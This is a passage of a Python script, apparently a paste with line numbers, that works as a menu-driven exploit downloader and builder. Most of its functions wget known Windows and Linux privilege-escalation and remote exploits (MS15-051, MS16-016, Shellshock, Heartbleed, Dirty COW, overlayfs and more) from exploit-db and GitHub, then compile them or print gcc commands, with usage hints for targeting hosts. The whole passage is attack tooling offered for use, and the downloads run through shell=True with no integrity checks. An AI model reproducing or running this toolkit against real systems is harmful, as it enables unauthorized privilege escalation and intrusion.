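        ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-32.exe -O ms15-051_32.exe; wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37049-64.exe -O ms15-051_64.exe'),
    ]
    if not run(steps):
        return
    printGood("ms15-051_32.exe and ms15-051_64.exe successfully created")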
  461.  
def ms16_014():
    """Fetch exploit-db archive 40039, unpack it, and build ms16-014.exe.

    The cleanup step removes the zip and __MACOSX but leaves the 40039
    directory behind. Listed with a '*' in the menu. run() and printGood()
    are defined elsewhere in this file; no integrity check on the archive.
    """
    steps = [
        ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40039.zip -O ms16-014.zip'),
        ('Unpacking...', 'unzip ms16-014.zip'),
        ('Compiling...', 'cd 40039; i686-w64-mingw32-g++ MS16-014.cpp -o ../ms16-014.exe'),
        ('Cleaning up...', 'rm -r ms16-014.zip __MACOSX'),
    ]
    if not run(steps):
        return
    printGood("ms16-014.exe successfully created")
  471.  
def ms16_016():
    """Fetch exploit-db archive 39788 and keep its prebuilt EoP.exe and Shellcode.dll.

    Both artifacts are precompiled binaries from ``master``, used without
    any checksum or signature check. run() and printGood() are defined
    elsewhere in this file.
    """
    steps = [
        ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39788.zip -O ms16-016.zip'),
        ('Unpacking...', 'unzip ms16-016.zip; cd 39788; unzip compiled.zip'),
        ('Cleaning up...', 'cp 39788/EoP.exe ms16_016.exe; cp 39788/Shellcode.dll Shellcode.dll;rm ms16-016.zip; rm -r 39788 __MACOSX'),
    ]
    if not run(steps):
        return
    printGood("ms16_016.exe and Shellcode.dll successfully created")
  480.  
def ms16_032():
    """Download exploit-db entry 39719 as ms16_032.ps1.

    Single download step, no integrity check on the script. run() and
    printGood() are defined elsewhere in this file.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/39719 -O ms16_032.ps1'),
    ]
    if not run(steps):
        return
    printGood("ms16_032.ps1 successfully created\n\t - for use with powershell")
  487.  
# Menu table for the "Windows local" category: (display label, builder).
# A leading '*' on a label marks an option the file header describes as either
# not working or requiring compilation on the target.
exploits_windows_local = [
    ("windows-privesc-check", windows_privesc_check),
    ("ms04-011", ms04_011_local),
    ("ms04-019 (1)", ms04_019_1),
    ("ms04-019 (2)", ms04_019_2),
    ("ms04-019 (3)", ms04_019_3),
    ("ms04-020", ms04_020),
    ("*keybd_event", keybd),
    ("*ms05-018", ms05_018),
    ("*ms05-055", ms05_055),
    ("ms06-030", ms06_030),
    ("ms06-049", ms06_049),
    ("print spool service", spool),
    ("*ms08-025", ms08_025),
    ("netdde", netdde),
    ("ms10-015", ms10_015),
    ("ms10-059", ms10_059),
    ("ms10-092", ms10_092),
    ("ms11-080", ms11_080),
    ("ms14-040", ms14_040),
    ("*ms14-058 (1)", ms14_058_1),
    ("ms14-058 (2)", ms14_058_2),
    ("*ms14-070 (1)", ms14_070_1),
    ("ms14-070 (2)", ms14_070_2),
    ("*ms15-010 (1)", ms15_010_1),
    ("*ms15-010 (2)", ms15_010_2),
    ("ms15-051", ms15_051),
    ("*ms16-014", ms16_014),
    ("ms16-016", ms16_016),
    ("ms16-032", ms16_032),
]
  519.  
  520. # ------------------------------------
  521. # LINUX REMOTE
  522. # ------------------------------------
  523.  
def shellshock():
    """Download exploit-db entry 34900 as shellshock.py and mark it executable.

    run() and printGood() are defined elsewhere in this file. The script is
    made runnable without being inspected or checksum-verified.
    """
    steps = [
        ('Downloading...', 'wget https://www.exploit-db.com/download/34900 -O shellshock.py'),
        ('Preparing...', 'chmod 744 shellshock.py'),
    ]
    if not run(steps):
        return
    printGood("shellshock.py successfully created\n\t")
  531.  
def heartbleed():
    """Download heartbleed.c from a personal GitHub repo and build it natively.

    Source comes from the moving ``master`` branch of a third-party repo and
    is compiled with the host gcc, with no checksum or signature check.
    run() and printGood() are defined elsewhere in this file.
    """
    steps = [
        ('Downloading...', 'wget https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c -O heartbleed.c'),
        ('Compiling...', 'gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto'),
        ('Cleaning up...', 'rm heartbleed.c'),
    ]
    if not run(steps):
        return
    printGood("heartbleed successfully created\n\tUsage: heartbleed -s <target> -p <port> -f <output file> -v -t 1")
  540.  
# Menu table for the "Linux remote" category: (display label, builder).
exploits_linux_remote = [
    ("shellshock", shellshock),
    ("heartbleed", heartbleed),
]
  545.  
  546. # ------------------------------------
  547. # LINUX LOCAL
  548. # -- These should be compiled on target if possible
  549. # ------------------------------------
  550.  
def linux_exploit_suggester():
    """Install the linux-exploit-suggester package and copy its Perl script here.

    The first step is a package install, which normally needs root; the
    label says 'Downloading...' but the command is apt-get. run() and
    printGood() are defined elsewhere in this file.
    """
    steps = [
        ('Downloading...', 'apt-get install linux-exploit-suggester'),
        ('Cleaning up...', 'cp /usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl linux-exploit-suggester.pl'),
    ]
    if not run(steps):
        return
    printGood("linux-exploit-suggester.pl successfully created\n\tUsage: perl linux-exploit-suggester.pl -k <kernel>")
  558.  
def unix_privesc_check():
    """Fetch unix-privesc-check 1.4 over plain HTTP and keep the script.

    The download URL is http://, so the archive can be altered in transit;
    no checksum is verified afterwards. run() and printGood() are defined
    elsewhere in this file.
    """
    steps = [
        ('Downloading...', 'wget http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz'),
        ('Unpacking...', 'tar xvzf unix-privesc-check-1.4.tar.gz; cp unix-privesc-check-1.4/unix-privesc-check .'),
        ('Cleaning up...', 'rm unix-privesc-check-1.4.tar.gz; rm -r unix-privesc-check-1.4'),
    ]
    if not run(steps):
        return
    printGood("unix_privesc_check successfully created")
  567.  
def sendpage_1():
    """Download exploit-db entry 9545 as sendpage.c and echo a compile hint.

    Not compiled here (see the section header about compiling on target).
    run() is defined elsewhere in this file; its result is ignored. The
    source is saved without any integrity check.
    """
    run([
        ('Downloading...', 'wget https://www.exploit-db.com/download/9545 -O sendpage.c'),
        ('Compile with:', 'echo "gcc -Wall -o sendpage sendpage.c"'),
    ])
  574.  
def sendpage_2():
    """Download exploit-db entry 9479 as sendpage.c and echo a compile hint.

    Overwrites the file written by sendpage_1. run() is defined elsewhere in
    this file; its result is ignored. No integrity check on the download.
    """
    run([
        ('Downloading...', 'wget https://www.exploit-db.com/download/9479 -O sendpage.c'),
        ('Compile with:', 'echo "gcc -Wall -o sendpage sendpage.c"'),
    ])
  581.  
def ftruncate():
    """Download exploit-db entry 6851 as ftruncate.c and echo usage hints.

    The third step echoes a find command; its inner double quotes are
    consumed by the shell, so the printed text loses them. run() is defined
    elsewhere in this file; its result is ignored. No integrity check.
    """
    run([
        ('Downloading...', 'wget https://www.exploit-db.com/download/6851 -O ftruncate.c'),
        ('Compile with:', 'echo "gcc -o ftruncate ftruncate.c"'),
        ('Note: use in world-writable directory, located using the following command:', 'echo "find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx""'),
    ])
  589.  
def cap_sys_admin():
    """Download exploit-db entry 15944 as cap_sys_admin.c and echo a compile hint.

    run() is defined elsewhere in this file; its result is ignored. The
    source is saved without any integrity check.
    """
    run([
        ('Downloading...', 'wget https://www.exploit-db.com/download/15944 -O cap_sys_admin.c'),
        ('Compile with:', 'echo "gcc -w cap_sys_admin.c -o cap_sys_admin_expl"'),
    ])
  596.  
def compat():
    """Download exploit-db entry 15024 as compat.c and echo a compile hint.

    run() is defined elsewhere in this file; its result is ignored. No
    integrity check on the download.
    """
    run([
        ('Downloading...', 'wget https://www.exploit-db.com/download/15024 -O compat.c'),
        ('Compile with:', 'echo "gcc -o compat compat.c"'),
    ])
  603.  
def can_bcm():
    """Download exploit-db entry 14814 as can_bcm_expl.c and echo a compile hint.

    run() is defined elsewhere in this file; its result is ignored. No
    integrity check on the download.
    """
    run([
        ('Downloading...', 'wget https://www.exploit-db.com/download/14814 -O can_bcm_expl.c'),
        ('Compile with:', 'echo "gcc -o can_bcm_expl can_bcm_expl.c"'),
    ])
  610.  
def rdsProtocol():
    """Download exploit-db entry 15285 as rds_expl.c and echo a compile hint.

    run() is defined elsewhere in this file; its result is ignored. No
    integrity check on the download.
    """
    run([
        ('Downloading...', 'wget https://www.exploit-db.com/download/15285 -O rds_expl.c'),
        ('Compile with:', 'echo "gcc -o rds_expl rds_expl.c"'),
    ])
  617.  
def halfNelson():
    """Download exploit-db entry 17787 as half-nelson.c and echo a compile hint.

    run() is defined elsewhere in this file; its result is ignored. No
    integrity check on the download.
    """
    run([
        ('Downloading...', 'wget https://www.exploit-db.com/download/17787 -O half-nelson.c'),
        ('Compile with:', 'echo "gcc -o half-nelson half-nelson.c -lrt"'),
    ])
  624.  
def fullNelson():
    """Download exploit-db entry 15704 as full-nelson.c and echo a compile hint.

    run() is defined elsewhere in this file; its result is ignored. No
    integrity check on the download.
    """
    run([
        ('Downloading...', 'wget https://www.exploit-db.com/download/15704 -O full-nelson.c'),
        ('Compile with:', 'echo "gcc -o full-nelson full-nelson.c"'),
    ])
  631.  
def udev():
    """Download exploit-db entry 8572 as udev_expl.c and echo a compile hint.

    run() is defined elsewhere in this file; its result is ignored. No
    integrity check on the download.
    """
    run([
        ('Downloading...', 'wget https://www.exploit-db.com/download/8572 -O udev_expl.c'),
        ('Compile with:', 'echo "gcc -o udev_expl udev_expl.c"'),
    ])
  638.  
def sgid():
    """Download exploit-db entry 33824 as sgid_expl.c and echo a compile hint.

    run() is defined elsewhere in this file; its result is ignored. No
    integrity check on the download.
    """
    run([
        ('Downloading...', 'wget https://www.exploit-db.com/download/33824 -O sgid_expl.c'),
        ('Compile with:', 'echo "gcc -o sgid_expl sgid_expl.c"'),
    ])
  645.  
def overlayfs_1():
    """Download exploit-db entry 37292 as overlayfs.c and echo a compile hint.

    overlayfs_2 and overlayfs_3 write the same file name. run() is defined
    elsewhere in this file; its result is ignored. No integrity check.
    """
    run([
        ('Downloading...', 'wget https://www.exploit-db.com/download/37292 -O overlayfs.c'),
        ('Compile with:', 'echo "gcc -o overlayfs overlayfs.c"'),
    ])
  652.  
def libfutex():
    """Download exploit-db entry 35370 as libfutex.c and echo a compile hint.

    run() is defined elsewhere in this file; its result is ignored. No
    integrity check on the download.
    """
    run([
        ('Downloading...', 'wget https://www.exploit-db.com/download/35370 -O libfutex.c'),
        ('Compile with:', 'echo "gcc -o libfutex libfutex.c -lpthread"'),
    ])
  659.  
def mempodipper():
    """Download exploit-db entry 18411 as mempodipper.c and echo a compile hint.

    run() is defined elsewhere in this file; its result is ignored. No
    integrity check on the download.
    """
    run([
        ('Downloading...', 'wget https://www.exploit-db.com/download/18411 -O mempodipper.c'),
        ('Compile with:', 'echo "gcc -o mempodipper mempodipper.c"'),
    ])
  666.  
def alpha_omega():
    """Download exploit-db entry 17391 as alpha-omega.c and echo a compile hint.

    run() is defined elsewhere in this file; its result is ignored. No
    integrity check on the download.
    """
    run([
        ('Downloading...', 'wget https://www.exploit-db.com/download/17391 -O alpha-omega.c'),
        ('Compile with:', 'echo "gcc -o alpha-omega alpha-omega.c"'),
    ])
  673.  
def dirtycow():
  """Fetch EDB 40616 as dirtycow_64.c, derive dirtycow_32.c, echo both gcc lines.

  The download is not integrity-verified (no hash or signature check), and
  the compile steps are only echoed, never executed.
  """
  download = ('Downloading...', 'wget https://www.exploit-db.com/download/40616 -O dirtycow_64.c')
  # The sed passes insert C comment markers into the copy so a different embedded
  # byte table becomes the active one.  NOTE(review): the match strings are tied
  # to the exact text of the published file -- confirm against the fetched source.
  make_32bit = ('Fixing...', "cp dirtycow_64.c dirtycow_32.c; sed -i 's/0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/\/* 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/g' dirtycow_32.c; sed -i 's/unsigned int sc_len = 177;/unsigned int sc_len = 177; *\//g' dirtycow_32.c; sed -i 's/0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/*\/ 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,/g' dirtycow_32.c; sed -i 's/unsigned int sc_len = 136;/unsigned int sc_len = 136;\/*/g' dirtycow_32.c")
  build_hint = ('Compile with:', 'echo "gcc -o dirtycow_64 dirtycow_64.c -pthread"; echo "gcc -o dirtycow_32 dirtycow_32.c -pthread"')
  run([download, make_32bit, build_hint])
  681.  
def msr():
  """Fetch EDB 27297 as msr_expl.c and echo its gcc line.

  The download is not integrity-verified (no hash or signature check), and
  the compile step is only echoed, never executed.
  """
  download = ('Downloading...', 'wget https://www.exploit-db.com/download/27297 -O msr_expl.c')
  build_hint = ('Compile with:', 'echo "gcc -o msr_expl msr_expl.c"')
  run([download, build_hint])
  688.  
def perf_swevent_init():
  """Fetch EDB 26131 as perf.c and echo its gcc line.

  The download is not integrity-verified (no hash or signature check), and
  the compile step is only echoed, never executed.
  """
  download = ('Downloading...', 'wget https://www.exploit-db.com/download/26131 -O perf.c')
  build_hint = ('Compile with:', 'echo "gcc -o perf perf.c"')
  run([download, build_hint])
  695.  
def overlayfs_2():
  """Fetch EDB 39166 as overlayfs.c and echo its gcc line.

  The download is not integrity-verified (no hash or signature check), and
  the compile step is only echoed, never executed.  Note that overlayfs_1 and
  overlayfs_3 write to the same overlayfs.c filename.
  """
  download = ('Downloading...', 'wget https://www.exploit-db.com/download/39166 -O overlayfs.c')
  build_hint = ('Compile with:', 'echo "gcc -o overlayfs overlayfs.c"')
  run([download, build_hint])
  702.  
def overlayfs_3():
  """Fetch EDB 39230 as overlayfs.c and echo its gcc line.

  The download is not integrity-verified (no hash or signature check), and
  the compile step is only echoed, never executed.  Note that overlayfs_1 and
  overlayfs_2 write to the same overlayfs.c filename.
  """
  download = ('Downloading...', 'wget https://www.exploit-db.com/download/39230 -O overlayfs.c')
  build_hint = ('Compile with:', 'echo "gcc -o overlayfs overlayfs.c"')
  run([download, build_hint])
  709.  
def af_packet():
  """Fetch EDB 40871 as af_packet.c and echo its gcc line (links -lpthread).

  The download is not integrity-verified (no hash or signature check), and
  the compile step is only echoed, never executed.
  """
  download = ('Downloading...', 'wget https://www.exploit-db.com/download/40871 -O af_packet.c')
  # Label keeps its trailing space as published.
  build_hint = ('Compile with: ', 'echo "gcc -o af_packet af_packet.c -lpthread"')
  run([download, build_hint])
  716.  
def double_fdput():
  """Fetch the EDB 39772 archive, unpack it, and echo the build instructions.

  The download is not integrity-verified (no hash or signature check), and
  the compile step is only echoed, never executed.
  """
  steps = [
    ('Downloading...', 'wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip -O double_fdput.zip'),
    # Each step is its own shell invocation, so this 'cd' does not carry over.
    ('Unpacking...', 'unzip double_fdput.zip; cd 39772; tar xvf exploit.tar;'),
    ('Compile with: ', 'echo "cd 39772/ebpf_mapfd_doubleput_exploit; ./compile.sh"'),
    # Empty command: this entry exists only to print its label.
    ('Run ./doubleput', ''),
  ]
  run(steps)
  725.  
def netfilter():
  """Fetch EDB 40049, carve it into decr.c and pwn.c, echo the gcc lines, clean up.

  The download is not integrity-verified (no hash or signature check), and
  the compile step is only echoed, never executed.
  """
  steps = [
    ('Downloading...', 'wget https://www.exploit-db.com/download/40049 -O netfilter.c'),
    # Splits the file by fixed line ranges.  NOTE(review): these counts assume the
    # published file's layout is unchanged -- confirm against the fetched source.
    ('Fixing...', 'tail -n 50 netfilter.c > pwn.c; head -n 213 netfilter.c > intermediate.c; tail -n 208 intermediate.c > decr.c'),
    ('Compile with:', 'echo "gcc -o decr decr.c -m32 -O2; gcc pwn.c -O2 -o pwn"'),
    # Empty command: this entry exists only to print its label.
    ('Run decr, then pwn', ''),
    ('Cleaning up...', 'rm netfilter.c intermediate.c'),
  ]
  run(steps)
  735.  
def refcount():
  """Fetch EDB 39277 as refcount.c and echo its gcc line (links -lkeyutils).

  The download is not integrity-verified (no hash or signature check), and
  the compile step is only echoed, never executed.
  """
  download = ('Downloading...', 'wget https://www.exploit-db.com/download/39277 -O refcount.c')
  build_hint = ('Compile with:', 'echo "gcc -o refcount refcount.c -lkeyutils -Wall"')
  run([download, build_hint])
  742.  
# (menu label, builder function) pairs.  Position in this list, offset by the
# cumulative size of the earlier tables (see endpoints), is the id shown by
# usage() and accepted by select().
exploits_linux_local = [
  ("linux-exploit-suggester", linux_exploit_suggester),
  ("unix_privesc_check", unix_privesc_check),
  ("kernel 2.4.x / 2.6.x (sock_sendpage 1)", sendpage_1),
  ("kernel 2.4 / 2.6 (sock_sendpage 2)", sendpage_2),
  ("kernel < 2.6.22 (ftruncate)", ftruncate),
  ("kernel < 2.6.34 (cap_sys_admin)", cap_sys_admin),
  ("kernel 2.6.27 < 2.6.36 (compat)", compat),
  ("kernel < 2.6.36-rc1 (can bcm)", can_bcm),
  ("kernel <= 2.6.36-rc8 (rds protocol)", rdsProtocol),
  ("*kernel < 2.6.36.2 (half nelson)", halfNelson),
  ("*kernel <= 2.6.37 (full nelson)", fullNelson),
  ("kernel 2.6 (udev)", udev),
  ("kernel 3.13 (sgid)", sgid),
  ("kernel 3.13.0 < 3.19 (overlayfs 1)", overlayfs_1),
  ("kernel 3.14.5 (libfutex)", libfutex),
  ("kernel 2.6.39 <= 3.2.2 (mempodipper)", mempodipper),
  ("*kernel 2.6.28 / 3.0 (alpha-omega)", alpha_omega),
  ("kernel 2.6.22 < 3.9 (Dirty Cow)", dirtycow),
  ("kernel 3.7.6 (msr)", msr),
  ("*kernel < 3.8.9 (perf_swevent_init)", perf_swevent_init),
  ("kernel <= 4.3.3 (overlayfs 2)", overlayfs_2),
  ("kernel 4.3.3 (overlayfs 3)", overlayfs_3),
  ("kernel 4.4.0 (af_packet)", af_packet),
  ("kernel 4.4.x (double-fdput)", double_fdput),
  ("kernel 4.4.0-21 (netfilter)", netfilter),
  ("*kernel 4.4.1 (refcount)", refcount),
]
  771.  
  772. # ------------------------------------
  773. # UTILITY
  774. # ------------------------------------
  775.  
def endpoints(i):
  """Return the cumulative entry count up to and including menu group *i*.

  Groups are 1 = windows remote, 2 = windows local, 3 = linux remote,
  4 = linux local, in menu order.  *i* may be an int or a numeric string.
  Non-numeric input and ``i <= 0`` yield 0; values above 4 are clamped to
  the grand total.
  """
  try:
    group = int(i)
  except ValueError:
    return 0
  tables = (
    exploits_windows_remote,
    exploits_windows_local,
    exploits_linux_remote,
    exploits_linux_local,
  )
  # Zero/negative select no tables; anything past the last group takes all of them.
  taken = max(0, min(group, len(tables)))
  return sum(len(t) for t in tables[:taken])
  791.  
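def usage():
  """Print the command line syntax and the numbered menu of all entries.

  Ids are contiguous across the four sections; each table is offset by the
  cumulative size of the sections before it (see endpoints).  Uses
  ``print(...)`` so the file parses under Python 3 as well as Python 2.
  """
  print("USAGE: %s <exploit id>" % sys.argv[0])
  sections = (
    ("\nWindows Remote Exploits:", exploits_windows_remote, 0),
    ("\nWindows Local Exploits:", exploits_windows_local, 1),
    ("\nLinux Remote Exploits:", exploits_linux_remote, 2),
    ("\nLinux Local Exploits:", exploits_linux_local, 3),
  )
  for title, table, group in sections:
    print(title)
    # Hoisted: endpoints() re-sums the table lengths on every call.
    start = endpoints(group)
    for i in range(start, endpoints(group + 1)):
      print("%i: %s" % (i, table[i - start][0]))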
  806.  
def select(i):
  """Run the builder for global id *i*.

  Returns False without doing anything when *i* is outside
  ``[0, endpoints(4))``; otherwise announces the entry via printStep, calls
  its builder and returns True.
  """
  if i < 0 or i >= endpoints(4):
    return False
  tables = (
    (exploits_windows_remote, 0),
    (exploits_windows_local, 1),
    (exploits_linux_remote, 2),
    (exploits_linux_local, 3),
  )
  # The first table whose upper bound exceeds i owns that id.
  for table, group in tables:
    if i < endpoints(group + 1):
      entry = table[i - endpoints(group)]
      printStep("Constructing %s" % entry[0])
      entry[1]()
      break
  return True
  824.  
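def run(commands):
  """Execute a sequence of ``(label, shell command)`` steps in order.

  Each label is echoed via printStep before its command runs.  Stops at the
  first failing step (non-zero exit or a spawn error), reports it via printErr
  and returns False; returns True when every step exited 0.
  """
  # NOTE(review): shell=True is tolerable only because every command string in
  # this file is a fixed literal from the builder functions.  Never route
  # user-controlled text into this function.
  try:
    for step in commands:
      printStep(step[0])
      subprocess.check_call(step[1], shell=True)
  except (subprocess.CalledProcessError, OSError):
    # Both failure modes were handled identically; one handler makes that explicit.
    printErr("Command failed")
    return False
  return True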
  837.  
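def printStep(s):
  """Print *s* as a yellow ``[*]`` progress line (ANSI colour, reset after)."""
  # print(...) with one argument behaves the same on Python 2 and 3.
  print("%s [*] %s %s" % ('\033[93m', s, '\033[0m'))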
  840.  
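def printErr(s):
  """Print *s* as a red ``[!]`` error line (ANSI colour, reset after)."""
  # print(...) with one argument behaves the same on Python 2 and 3.
  print("%s [!] %s %s" % ('\033[91m', s, '\033[0m'))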
  843.  
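def printGood(s):
  """Print *s* as a green ``[+]`` success line (ANSI colour, reset after)."""
  # print(...) with one argument behaves the same on Python 2 and 3.
  print("%s [+] %s %s" % ('\033[92m', s, '\033[0m'))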
  846.  
  847. # ------------------------------------
  848. # MAIN
  849. # ------------------------------------
  850.  
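# Entry point: exactly one argument, the numeric id from usage().
# '!=' replaces the Python-2-only '<>' and print(...) replaces the print
# statement so the file at least parses under Python 3.
if len(sys.argv) != 2:
  usage()
  sys.exit()

try:
  success = select(int(sys.argv[1]))
except ValueError:
  # Non-numeric argument: reported the same way as an out-of-range id.
  success = False
if not success:
  print("[-] Invalid selection: %s" % sys.argv[1])
  usage()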